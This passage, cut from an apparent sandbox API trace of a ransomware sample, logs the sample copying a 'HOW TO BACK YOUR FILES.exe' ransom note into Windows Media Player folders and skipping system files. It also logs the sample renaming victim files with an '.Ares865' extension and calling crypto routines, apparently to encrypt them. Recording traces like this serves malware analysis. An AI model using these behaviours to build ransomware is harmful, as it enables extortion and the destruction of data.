ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.305] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.305] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.305] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.305] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.305] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.305] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.306] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.306] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.306] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521da960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.306] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.306] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521da960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0122.306] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.306] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0122.306] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\Skins", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Skins") returned="C:\\Program Files (x86)\\Windows Media Player\\Skins" [0122.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3120 | out: hHeap=0x2b0000) returned 1 [0122.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0122.306] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Skins") returned 49 [0122.306] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\Skins" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Skins") returned="C:\\Program Files (x86)\\Windows Media Player\\Skins" [0122.306] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.306] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Skins\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\skins\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.307] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.307] GetLastError () returned 0x0 [0122.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.307] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.307] CloseHandle (hObject=0x120) returned 1 [0122.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.307] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.308] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Skins\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.308] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.308] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.308] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.308] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.308] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.308] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.308] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521da960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.308] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.308] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="aoldtz.exe") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2=".") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="..") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="windows") returned -1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="bootmgr") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="temp") returned -1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="pagefile.sys") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="boot") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="ids.txt") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="ntuser.dat") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="perflogs") returned 1 [0122.308] lstrcmpiW (lpString1="Revert.wmz", lpString2="MSBuild") returned 1 [0122.308] lstrlenW (lpString="Revert.wmz") returned 10 [0122.309] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Skins\\*") returned 51 [0122.309] lstrcpyW (in: lpString1=0x2cce464, lpString2="Revert.wmz" | out: lpString1="Revert.wmz") returned="Revert.wmz" [0122.309] lstrlenW (lpString="Revert.wmz") returned 10 [0122.309] lstrlenW (lpString="Ares865") returned 7 [0122.309] lstrcmpiW (lpString1="ert.wmz", lpString2="Ares865") returned 1 [0122.309] lstrlenW (lpString=".dll") returned 4 [0122.309] lstrcmpiW (lpString1="Revert.wmz", lpString2=".dll") returned 1 [0122.309] lstrlenW (lpString=".lnk") returned 4 [0122.309] lstrcmpiW (lpString1="Revert.wmz", lpString2=".lnk") returned 1 [0122.309] lstrlenW (lpString=".ini") returned 4 [0122.309] lstrcmpiW (lpString1="Revert.wmz", lpString2=".ini") returned 1 [0122.309] lstrlenW (lpString=".sys") returned 4 [0122.309] lstrcmpiW (lpString1="Revert.wmz", lpString2=".sys") returned 1 [0122.309] lstrlenW (lpString="Revert.wmz") returned 10 [0122.309] lstrcmpiW (lpString1="wmz", lpString2="bak") returned 1 [0122.310] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.Ares865") returned 68 [0122.310] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz.ares865"), dwFlags=0x1) returned 1 [0122.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Skins\\Revert.wmz.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\skins\\revert.wmz.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67209) returned 1 [0122.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.312] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.313] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.313] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.313] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10990, lpName=0x0) returned 0x170 [0122.314] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10990) returned 0x190000 [0122.324] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.325] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.326] CloseHandle (hObject=0x170) returned 1 [0122.326] CloseHandle (hObject=0x118) returned 1 [0122.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.327] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e98f1d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e98f1d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3ebf07d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10689, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Revert.wmz", cAlternateFileName="")) returned 0 [0122.327] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.327] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0122.327] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing") returned="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing" [0122.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0122.327] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing") returned 59 [0122.327] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing") returned="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing" [0122.327] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.327] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\network sharing\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.328] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.328] GetLastError () returned 0x0 [0122.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.328] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.328] CloseHandle (hObject=0x120) returned 1 [0122.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.329] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.329] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.329] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.329] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.329] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.329] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.329] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.329] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.329] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.329] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.329] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521da960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0122.329] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0122.329] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x521da960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0122.329] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.329] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0122.329] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer") returned="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer" [0122.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0122.329] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer") returned 58 [0122.329] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer") returned="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer" [0122.329] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.330] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.331] GetLastError () returned 0x0 [0122.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.331] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.331] CloseHandle (hObject=0x120) returned 1 [0122.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.331] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.331] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.331] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.331] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5224cd80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5224cd80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.331] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.331] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0122.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.331] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x52226c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="avtransport.xml.Ares865", cAlternateFileName="")) returned 1 [0122.331] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.331] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0122.331] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2=".") returned 1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="..") returned 1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="windows") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="bootmgr") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="temp") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="pagefile.sys") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="boot") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="ids.txt") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="ntuser.dat") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="perflogs") returned -1 [0122.332] lstrcmpiW (lpString1="avtransport.xml.Ares865", lpString2="MSBuild") returned -1 [0122.332] lstrlenW (lpString="avtransport.xml.Ares865") returned 23 [0122.332] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*") returned 60 [0122.332] lstrcpyW (in: lpString1=0x2cce476, lpString2="avtransport.xml.Ares865" | out: lpString1="avtransport.xml.Ares865") returned="avtransport.xml.Ares865" [0122.332] lstrlenW (lpString="avtransport.xml.Ares865") returned 23 [0122.332] lstrlenW (lpString="Ares865") returned 7 [0122.332] lstrcmpiW 